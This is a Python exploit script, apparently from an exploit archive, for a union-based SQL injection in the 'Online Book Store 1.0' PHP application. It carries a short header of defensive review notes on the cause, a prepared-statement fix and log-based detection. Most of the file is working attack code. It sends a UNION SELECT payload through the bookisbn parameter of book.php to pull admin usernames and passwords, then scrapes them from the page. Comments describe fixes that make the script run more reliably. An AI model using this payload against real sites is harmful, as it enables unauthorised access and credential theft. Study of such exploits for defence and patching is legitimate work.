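# Exploit Title: Online Book Store Union Based Sql Injection
# Date: 2020-10-25
# Exploit Author: ferhatcil
# Vendor Homepage: https://projectworlds.in/
# Software Link: https://www.sourcecodester.com/php/14550/online-book-store-php-full-source-code.html
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE : N/A
#
# Review notes (defensive context):
# - The request built in xx() places a UNION SELECT in the `bookisbn` query
#   parameter of book.php and reads the result back from the rendered page.
#   That this works implies the parameter reaches the SQL statement without
#   parameter binding (inferred; book.php itself is not shown here).
# - Application-side fix: bind `bookisbn` through a prepared statement, and
#   store admin passwords as salted password hashes so that a read of the
#   admin table does not yield directly usable credentials.
# - Detection: review web-server access logs for book.php requests whose
#   `bookisbn` value contains a quote, `union`, `select` or `group_concat`.
#
# Exploit Code

import getopt
import json
import sys
import requests
import colorama
from colorama import Fore, Style
from bs4 import BeautifulSoup

# The original script referenced VERSION without defining it, so usage()
# raised NameError. Constructed value, mirroring the "Version: 1.0" header.
VERSION = "1.0"

# Query string sent to the target, kept exactly as published.
_PAYLOAD_PATH = (
    "/book.php?bookisbn=-x' union select 1,2,3,4,"
    "group_concat(name,':',pass),6,7 from admin -- -"
)

# Upper bound in seconds for the HTTP request, so an unresponsive host does
# not hang the script indefinitely.
_REQUEST_TIMEOUT = 10


def usage():
    """Print the command-line help text and exit with status 1."""
    print("Online Book Store SQLi {} ( github.com/ferhatcil )".format(VERSION))
    print("Usage: " + sys.argv[0] + " [OPTIONS]")
    print(" --domain\texample.com")
    print("Examples:")
    print(" python3 " + sys.argv[0] + " --domain http://example.com")
    print(" python3 " + sys.argv[0] + " --domain http://example.com/bookstore")
    sys.exit(1)


def xx(domain):
    """Request book.php with the UNION payload and print the reflected text.

    Args:
        domain: Base URL of the application. When the string does not contain
            ``http://``, that scheme is prepended.

    The value is read from the first ``<p>`` inside the first
    ``div.col-md-6`` element of the response. When the request fails or the
    page lacks that element, ``[-] Error`` is printed instead.
    """
    if 'http://' not in domain:
        domain = "http://" + domain
    url = domain + _PAYLOAD_PATH

    try:
        r = requests.get(url, timeout=_REQUEST_TIMEOUT)
        soup = BeautifulSoup(r.text, 'html.parser')
        # find() returns None when the element is absent; the AttributeError
        # that follows is reported as a generic error below.
        data = soup.find('div', {'class': 'col-md-6'}).find("p").text
    except (requests.RequestException, AttributeError):
        # Narrowed from a bare ``except:`` so Ctrl-C and programming errors
        # are no longer swallowed.
        print(f"{Fore.RED}[-] Error{Style.RESET_ALL}")
        return

    print(f"{Fore.GREEN}[+] {Style.RESET_ALL}{Fore.YELLOW}{data}{Style.RESET_ALL}")


if __name__ == "__main__":
    try:
        # "d:" so -d takes a value like --domain does; -h/--help are
        # registered so the help branch below is reachable.
        opts, args = getopt.getopt(sys.argv[1:], "hd:", ["help", "domain="])
    except getopt.GetoptError as err:
        print(err)
        sys.exit(-1)

    # No recognised option (including no arguments at all): show the help
    # text instead of exiting silently.
    if not opts:
        usage()

    for o, a in opts:
        if o in ("-d", "--domain"):
            xx(a)
        elif o in ("-h", "--help"):
            usage()
        else:
            # Explicit exit rather than ``assert``, which is stripped when
            # Python runs with -O.
            print("unhandled option")
            sys.exit(-1)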